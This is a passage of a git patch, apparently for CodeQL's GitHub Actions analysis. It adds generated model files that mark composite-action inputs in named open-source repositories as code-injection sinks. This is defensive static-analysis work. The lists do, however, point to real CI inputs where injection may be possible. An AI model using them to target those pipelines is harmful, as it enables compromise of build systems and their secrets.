.../composite-actions/ruby_ruby.model.yml | 10 +++++++++ .../composite-actions/rusefi_rusefi.model.yml | 10 +++++++++ .../saltstack_salt.model.yml | 14 ++++++++++++ .../sap_sapmachine.model.yml | 6 +++++ .../scala-native_scala-native.model.yml | 7 ++++++ .../composite-actions/scitools_iris.model.yml | 8 +++++++ .../scylladb_scylla-operator.model.yml | 9 ++++++++ .../shader-slang_slang.model.yml | 10 +++++++++ .../shaka-project_shaka-player.model.yml | 9 ++++++++ ...ode_react-webpack-rails-tutorial.model.yml | 7 ++++++ .../simple-icons_simple-icons.model.yml | 6 +++++ .../slint-ui_slint.model.yml | 7 
++++++ .../solidusio_solidus.model.yml | 9 ++++++++ .../composite-actions/solo-io_gloo.model.yml | 6 +++++ .../composite-actions/sonarr_sonarr.model.yml | 12 ++++++++++ .../sonic-pi-net_sonic-pi.model.yml | 8 +++++++ .../spacedriveapp_spacedrive.model.yml | 6 +++++ .../spockframework_spock.model.yml | 6 +++++ .../spring-io_initializr.model.yml | 7 ++++++ .../spring-io_start.spring.io.model.yml | 7 ++++++ .../spring-projects_spring-boot.model.yml | 7 ++++++ ...spring-projects_spring-framework.model.yml | 7 ++++++ .../spring-projects_spring-graphql.model.yml | 7 ++++++ .../square_workflow-kotlin.model.yml | 8 +++++++ .../stefanprodan_podinfo.model.yml | 7 ++++++ .../composite-actions/stellar_go.model.yml | 6 +++++ .../streetsidesoftware_cspell.model.yml | 6 +++++ .../subquery_subql.model.yml | 6 +++++ .../swagger-api_swagger-codegen.model.yml | 11 ++++++++++ .../swagger-api_swagger-parser.model.yml | 11 ++++++++++ .../tarantool_tarantool.model.yml | 9 ++++++++ .../telepresenceio_telepresence.model.yml | 6 +++++ .../tensorflow_datasets.model.yml | 7 ++++++ .../texstudio-org_texstudio.model.yml | 6 +++++ .../toeverything_affine.model.yml | 13 +++++++++++ .../treeverse_lakefs.model.yml | 8 +++++++ .../trezor_trezor-firmware.model.yml | 9 ++++++++ .../tribler_tribler.model.yml | 10 +++++++++ .../trunk-io_trunk-action.model.yml | 13 +++++++++++ .../composite-actions/unidata_metpy.model.yml | 6 +++++ .../unstructured-io_unstructured.model.yml | 6 +++++ .../composite-actions/vercel_turbo.model.yml | 6 +++++ .../vesoft-inc_nebula.model.yml | 12 ++++++++++ .../composite-actions/vkcom_vkui.model.yml | 11 ++++++++++ .../vuetifyjs_vuetify.model.yml | 9 ++++++++ .../wagoodman_dive.model.yml | 6 +++++ ...lletconnect_walletconnectswiftv2.model.yml | 13 +++++++++++ .../composite-actions/wazuh_wazuh.model.yml | 8 +++++++ .../web-infra-dev_rspack.model.yml | 8 +++++++ .../webassembly_wabt.model.yml | 6 +++++ .../composite-actions/wntrblm_nox.model.yml | 6 +++++ 
.../composite-actions/xrplf_rippled.model.yml | 8 +++++++ .../composite-actions/zcash_zcash.model.yml | 7 ++++++ .../zenml-io_zenml.model.yml | 6 +++++ .../composite-actions/zeroc-ice_ice.model.yml | 7 ++++++ 315 files changed, 2594 insertions(+) create mode 100644 ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/adap_flower.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/anchore_grype.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/anchore_syft.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ansible_awx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_brpc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_camel.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_flink.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/apache_opendal.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_pekko.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_superset.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/armbian_build.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/badges_shields.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coder_coder.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/discourse_.github.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/emberjs_data.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/erlang_otp.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expensify_app.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expo_expo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_flow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/github_ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/google_dagger.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/grote_transportr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/infracost_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nektos_act.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oracle_graal.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/owntracks_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/php_php-src.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/primer_react.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/psf_black.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/python_mypy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quay_clair.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/randombit_botan.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rook_rook.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/roots_trellis.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ruby_debug.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scitools_iris.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/stellar_go.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/subquery_subql.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml new file mode 100644 index 00000000000..4bc9d5ed771 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["actions/actions-runner-controller", "*", "inputs.image-tag", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.image-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-controller-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.repo-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.repo-owner", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.workflow-file", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.auth-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml new file mode 100644 index 00000000000..3ce17568490 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["adap/flower", "*", "inputs.poetry-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.setuptools-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.pip-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git 